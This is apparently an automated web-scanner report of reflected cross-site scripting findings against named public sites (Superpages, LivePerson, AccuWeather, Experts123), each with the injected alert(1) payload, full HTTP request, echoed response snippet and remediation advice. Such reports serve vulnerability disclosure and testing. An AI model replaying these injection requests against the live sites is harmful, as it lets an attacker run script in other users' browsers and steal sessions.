HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64285 Date: Thu, 03 Feb 2011 17:11:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... m'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Pragma: public Cache-Control: max-age=0 Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 64190 Date: Thu, 03 Feb 2011 17:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c7f'-alert(1)-'d23b91857f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:47:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dc0c7f%27%2Dalert%281%29%2D%27d23b91857f7; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=LLOJGOICFHNPLMCFLGEAMHAL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5bc</script><script>alert(1)</script>da526c0c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index-radar.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Length: 64616 Content-Type: text/html Cache-Control: public Date: Thu, 03 Feb 2011 16:35:04 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea202</script><script>alert(1)</script>53080030620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps-satellite.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Length: 64040 Content-Type: text/html Cache-Control: public Date: Thu, 03 Feb 2011 16:35:14 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2434"%3balert(1)//40b9502e47 was submitted in the Referer HTTP header. This input was echoed as e2434";alert(1)//40b9502e47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2434"%3balert(1)//40b9502e47
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35109
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "e2434";alert(1)//40b9502e47"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80de'%3balert(1)//2bbe976dfa9 was submitted in the Referer HTTP header. This input was echoed as d80de';alert(1)//2bbe976dfa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d80de'%3balert(1)//2bbe976dfa9
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35111
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
